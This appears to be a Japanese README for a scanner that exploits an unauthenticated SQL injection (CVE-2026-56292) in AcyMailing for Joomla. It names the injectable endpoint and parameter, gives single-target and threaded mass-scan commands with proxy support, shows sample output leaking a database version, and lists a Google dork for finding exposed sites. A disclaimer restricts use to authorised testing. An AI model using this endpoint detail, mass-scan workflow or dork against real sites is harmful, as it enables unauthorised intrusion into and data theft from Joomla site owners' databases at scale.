
CVE-2026-56292 - AcyMailing for Joomla の未認証SQLインジェクションスキャナー
著者: nullwhisper
許可されたセキュリティ研究/脆弱性検証のみを対象としています。
AcyMailing for Joomla は、公開フロントエンドタスク frontentityselect::loadEntityFront を公開します。古いバージョンでは、columns パラメータがサニタイズなしでSQLクエリに直接渡されます。パッチ適用済みバージョンでは acym_secureDBColumn() を使用し、... not secured のようなエラーを返します。
index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFrontcolumns.
├── cve_2026_56292_acymailing_sqli.py # single + mass scanner
├── dorks.txt # google dorks
├── TECHNICAL.md # technical write-up
├── requirements.txt
├── LICENSE
└── README.md
pip3 install -r requirements.txt
単一ターゲット:
python3 cve_2026_56292_acymailing_sqli.py -u http://target/
一括スキャン:
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt
オプション:
-u URL single target
-l LIST target list file
-t TIMEOUT request timeout (default 30)
-T THREADS concurrent threads (default 10)
-o OUTPUT output file for vulnerable targets
-v verbose
--proxy PROXY http/https proxy
--patched-output FILE
--error-output FILE
ローカルのJoomla 5ラボ上のAcyMailing v11.0.3インストールに対してテストしました(脆弱性シミュレーションモード)。
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204
[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1
dorks.txt を参照してください。主なdork:
inurl:"index.php?option=com_acym"
このツールは、許可されたセキュリティテストおよび研究専用です。所有していないシステム、または明示的な書面によるテスト許可を得ていないシステムに対して使用しないでください。著者(nullwhisper)は、このコードによって引き起こされる誤用や損害について責任を負いません。
MIT — LICENSE を参照してください。